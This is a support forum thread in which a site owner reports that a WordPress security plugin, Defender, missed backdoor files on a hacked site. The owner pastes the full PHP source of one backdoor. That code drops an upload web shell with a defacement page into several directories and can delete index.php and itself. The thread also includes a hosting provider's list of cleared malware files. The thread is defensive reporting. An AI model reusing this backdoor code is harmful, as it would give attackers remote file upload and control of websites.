Defender might have overlooked files which do look suspicious

Hi folks,

I've decided to try out Defender, prompted at least partly because I think one of my sites has been hacked. I've attached two files which I found in /wp-content.

There are lots more files like this in /wp-content/uploads and /wp-content/uploads/sites.

I've installed Defender, run a scan, and Defender has told me:
"0 issues found. Congratulations! Everything is just fine."

It's just not looking fine from my perspective.

Happily, this site is currently running from WP Engine, so I've asked those folks to look into this and clean up if they need to.

Just wondered if you had any response to this?

  • Mina

    Oops, I wasn't allowed to upload the files (reasonable, as they were PHP). So here's what one of them contains:

    _input_zz.php5

    <?php error_reporting(0);if(isset($_GET["fjxtq"])){echo"[uname]".php_uname()."[/uname]";echo "<br>";print "\n";if(@ini_get("disable_functions")){echo "DisablePHP=".@ini_get("disable_functions");}else{ echo "Disable PHP = NONE";}echo "<br>";print "\n";if(@ini_get("safe_mode")){echo "Safe Mode = ON";}else{ echo "Safe Mode = OFF";}}$file = ' <?php if(isset($_GET["fjxtq"])){echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";echo "<br>";print "\n";if(@ini_get("disable_functions")){echo "DisablePHP=".@ini_get("disable_functions");}else{ echo "Disable PHP = NONE";}echo "<br>";print "\n";if(@ini_get("safe_mode")){echo "Safe Mode = ON";}else{ echo "Safe Mode = OFF";} echo "<br>";print "\n";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}?><?php echo "<!--  -->";echo "<br>";?><title>Hacked by d3b~X</title><center><div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}<!-- <?php echo md5(deb) ?> -->';
    $path = $_SERVER["DOCUMENT_ROOT"];
    $r=fopen($path."/ganteng.php", "w");fwrite($r,$file);fclose($r);
    $r=fopen($path."/wp-content/ganteng.php", "w");fwrite($r,$file);fclose($r);
    $r=fopen($path."/wp-admin/ganteng.php", "w");fwrite($r,$file);fclose($r);
    if(isset($_GET["patch"])){
     $r=fopen("./../.htaccess", "w");fwrite($r,"php_flag engine off");fclose($r);
     unlink("../index.php");
     unlink(__FILE__);
     echo "Patched";
    }
    echo md5(deb); ?>
  • Predrag Dubajic

    Hey Mina,

    Hope you're doing well today :slight_smile:

    Thanks a lot for providing us with the example file, I have added this to my test installation and Defender indeed didn't return any results for that file.

    I must say that I'm not sure why it missed it but I have forwarded your thread to Defender developer so he can have a closer look at this and give us some more info.

    Best regards,
    Predrag

  • Mina

    Wanted to post some follow-up. At the moment, this site is running on WP Engine, and I raised the issue with them too, as they offer security scans and clean-ups.

    I've just heard back from them that their systems cleared out the following files:

    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_UKK.php5 Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_AM0.php5 Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_31Q.phtml Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_HJ1.php5 Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_GFJ.php5 Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/6/_input_1_.php5 Details: php.backdoor.filesman.029.002
    CLEARED: Cleared suspicious malware from file: ./wp-content/uploads/sites/6/gravity_forms/_input_1_.php5 Details: php.backdoor.system.001
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/6/gravity_forms/_input_1_.phtml Details: php.backdoor.filesman.029.002
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/6/gravity_forms/_input_1_.php3 Details: php.backdoor.filesman.029.002
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/6/gravity_forms/_input_1_.pht Details: php.backdoor.filesman.029.002
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/6/2015/11/_input_3_rmt.php5 Details: php.malware.generic.019
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/6/2015/10/_input_3_upl.php5 Details: php.backdoor.filesman.038
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input__zz.php5 Details: php.backdoor.gagal.001
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_SYQ.phtml Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_TCA.phtml Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_UOZ.phtml Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_2IW.php5 Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_BTB.phtml Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_99M.phtml Details: php.backdoor.eval_REQUEST.008
    CLEARED: Cleared malware from file: ./wp-content/uploads/sites/_input_1_1V4.php5 Details: php.backdoor.eval_REQUEST.008

    The following files were also removed from the uploads directory after a secondary scan:

    _input_1_BTB.phtml
    _input_1_UOZ.phtml
    _input_1_EDN.phtml.
    _input_1_UY2.php.
    _input_1_GFJ.php5
    _input_1_XNB.phtml.
    _input_1_HJ1.php5
    _input_1_YHU.php5.
    _input_1_1V4.php5
    _input_1_N5S.php.
    _input_1_YQ1.php.
    _input_1_2IW.php5
    _input_1_O4H.php5.
    _input_1_Z7Q.phtml.
    _input_1_31Q.phtml
    _input_1_QX0.phtml.
    _input__zz.gif
    _input_1_99M.phtml
    _input_1_SYQ.phtml
    _input__zz.php.
    _input_1_AM0.php5
    _input_1_TCA.phtml
    _input__zz.php5
    _input_1_AOI.php5.
    _input_1_U9F.php5.
    _input_1_B6Z.php.
    _input_1_UKK.php5
    _input__filebox.php.jpg
    _input_1_.php.
    _input_1_.php5
    _input_3_.gif
    _input_3_.txt

    Hope this helps. It's a bit disquieting that Defender missed these.